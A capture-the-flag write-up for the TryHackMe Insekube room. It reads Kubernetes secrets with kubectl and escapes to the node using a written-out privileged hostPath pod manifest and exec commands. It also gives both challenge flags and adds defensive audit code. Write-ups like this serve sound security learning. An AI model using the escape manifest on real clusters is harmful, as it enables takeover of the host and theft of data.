Insekube (Kubernetes)

Task 1 - Introduction

01. What ports are open? (comma separated)

╭─hnl@hnl ~/Desktop/ctf/tryhackme/insekube  
╰─➤  nmap 10.10.122.48
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-04 00:56 +0630
Nmap scan report for 10.10.122.48
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Task 2 - RCE

01. What is flag 1?

First, we need to test for command injection.

Then we try to get RCE.

The third stage is to read the flag. The hint says "You will find the flag in an environment variable".

Task 3 - Interacting with kubernetes

When we list pods in the namespace, we only get a permission error, so we check our permissions. We can only list Kubernetes secrets.

Task 4 - Kubernetes Secrets

01. What is flag 2?

We can view Kubernetes secrets using this command.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl get secrets

NAME                    TYPE                                  DATA   AGE
default-token-8bksk     kubernetes.io/service-account-token   3      86d
developer-token-74lck   kubernetes.io/service-account-token   3      86d
secretflag              Opaque                                1      86d
syringe-token-g85mg     kubernetes.io/service-account-token   3      86d

We can list all of the data contained in the secret, but this only shows an overview.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl describe secret secretflag

Name:         secretflag
Namespace:    default
Labels:       <none>
Annotations:  <none>

Type:  Opaque

Data
====
flag:  38 bytes

So we output the secret in JSON format.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl get secret secretflag -o 'json'
{
    "apiVersion": "v1",
    "data": {
        "flag": "ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0="
    },
    "kind": "Secret",
    "metadata": {
        "annotations": {
            "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"data\":{\"flag\":\"ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0=\"},\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"secretflag\",\"namespace\":\"default\"},\"type\":\"Opaque\"}\n"
        },
        "creationTimestamp": "2022-01-06T23:41:19Z",
        "name": "secretflag",
        "namespace": "default",
        "resourceVersion": "562",
        "uid": "6384b135-4628-4693-b269-4e50bfffdf21"
    },
    "type": "Opaque"
}

Decode the base64.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/insekube  
╰─➤  echo 'ZmxhZ3tkZjJhNjM2ZGUxNTEwOGE0ZGM0MTEzNWQ5MzBkOGVjMX0=' | base64 -d
flag{df2a636de15108a4dc41135d930d8ec1}
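
As an added example (not part of the original write-up or the room), the Python sketch below takes a Secret object like the one above and reports every place its values can be read back in plaintext, including the kubectl.kubernetes.io/last-applied-configuration annotation visible in the JSON output. The sample Secret and its value are constructed, and the names secret_exposures and build_sample_secret are hypothetical.

```python
import base64
import json

LAST_APPLIED = "kubectl.kubernetes.io/last-applied-configuration"


def decode(b64_value):
    """Secret data is base64-encoded, not encrypted: decoding needs no key."""
    return base64.b64decode(b64_value).decode("utf-8", "replace")


def secret_exposures(secret):
    """Map each location of a Secret's values to the decoded plaintext."""
    found = {}
    for key, value in (secret.get("data") or {}).items():
        found[f"data.{key}"] = decode(value)
    # Client-side `kubectl apply` stores the submitted manifest, data
    # included, in this annotation, so the value exists twice.
    annotations = (secret.get("metadata") or {}).get("annotations") or {}
    if LAST_APPLIED in annotations:
        applied = json.loads(annotations[LAST_APPLIED])
        for key, value in (applied.get("data") or {}).items():
            found[f"annotation.data.{key}"] = decode(value)
        for key, value in (applied.get("stringData") or {}).items():
            found[f"annotation.stringData.{key}"] = value
    return found


def build_sample_secret(plaintext):
    """Build a constructed Secret shaped like the kubectl output above."""
    manifest = {
        "apiVersion": "v1",
        "kind": "Secret",
        "type": "Opaque",
        "data": {"flag": base64.b64encode(plaintext.encode()).decode()},
        "metadata": {"name": "secretflag", "namespace": "default", "annotations": {}},
    }
    live = json.loads(json.dumps(manifest))
    live["metadata"]["annotations"][LAST_APPLIED] = json.dumps(manifest) + "\n"
    return live


SAMPLE_SECRET = build_sample_secret("flag{constructed-sample}")  # constructed value

if __name__ == "__main__":
    for location, value in secret_exposures(SAMPLE_SECRET).items():
        print(f"{location}: {value}")
```

Redacting only the data field when sharing or logging such an object still leaves the value in the annotation.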

Task 5 - Recon in the cluster

We can see that Grafana is running on the cluster.

01. What is the version of Grafana running on the machine?

Read the page source using the curl command and copy it. Paste it into a text editor and search for the version keyword.

8.3.0-beta2

02. What is the CVE you've found?

CVE-2021-43798

Task 6 - Escape to the node

01. What is root.txt?

Write a YAML file based on this source: https://github.com/BishopFox/badPods/blob/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml

cat > privesc.yml <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: ubuntu
    imagePullPolicy: IfNotPresent
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF

Apply this YAML file.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl apply -f privesc.yml --token=<TOKEN>
pod/everything-allowed-exec-pod created

Check whether it is running.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl get pods --token=<TOKEN>
NAME                          READY   STATUS    RESTARTS       AGE
everything-allowed-exec-pod   1/1     Running   0              55s
grafana-57454c95cb-v4nrk      1/1     Running   10 (62d ago)   86d
syringe-79b66d66d7-7mxhd      1/1     Running   1 (62d ago)    62d

Log in to the container.

challenge@syringe-79b66d66d7-7mxhd:/tmp$ ./kubectl exec -it everything-allowed-exec-pod --token=<TOKEN> -- /bin/bash
Unable to use a TTY - input is not a terminal or the right kind of file
whoami
root

Find the root flag.

find / -type f -name root.txt 2>/dev/null
/host/root/root.txt
cat /host/root/root.txt
flag{30180a273e7da821a7fe4af22ffd1701}
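
From the defender's side, the manifest used in this task is what an admission check should reject. The Python function below is an added example, not code from the write-up or from badPods; it flags the host namespaces, privileged container and hostPath volume that privesc.yml combines, all of which the Kubernetes Pod Security Standards Baseline level disallows. The name audit_pod and both sample pods are constructed for illustration.

```python
HOST_FLAGS = ("hostNetwork", "hostPID", "hostIPC")
CONTAINER_KINDS = ("initContainers", "containers", "ephemeralContainers")


def audit_pod(pod):
    """Return the node-access findings for a parsed Pod object (dict)."""
    spec = pod.get("spec") or {}
    # Host namespaces let the pod see the node's network, processes and IPC.
    findings = [f"spec.{flag}=true" for flag in HOST_FLAGS if spec.get(flag) is True]
    # A hostPath volume exposes part (here all) of the node filesystem.
    for vol in spec.get("volumes") or []:
        if vol.get("hostPath"):
            findings.append(f"volume {vol.get('name')}: hostPath {vol['hostPath'].get('path')}")
    # privileged=true removes the container's device and capability limits.
    for kind in CONTAINER_KINDS:
        for ctr in spec.get(kind) or []:
            if (ctr.get("securityContext") or {}).get("privileged") is True:
                findings.append(f"{ctr.get('name')}: securityContext.privileged=true")
    return findings


# Constructed input mirroring the fields of privesc.yml.
RISKY_POD = {
    "metadata": {"name": "everything-allowed-exec-pod"},
    "spec": {
        "hostNetwork": True, "hostPID": True, "hostIPC": True,
        "containers": [{
            "name": "everything-allowed-pod",
            "image": "ubuntu",
            "securityContext": {"privileged": True},
            "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}],
        }],
        "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
    },
}
# Constructed counter-example: the same image with no host access.
SAFE_POD = {
    "metadata": {"name": "sleep-pod"},
    "spec": {"containers": [{
        "name": "sleep",
        "image": "ubuntu",
        "securityContext": {"privileged": False, "allowPrivilegeEscalation": False},
    }]},
}

if __name__ == "__main__":
    for pod in (RISKY_POD, SAFE_POD):
        print(pod["metadata"]["name"], audit_pod(pod) or "no findings")
```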
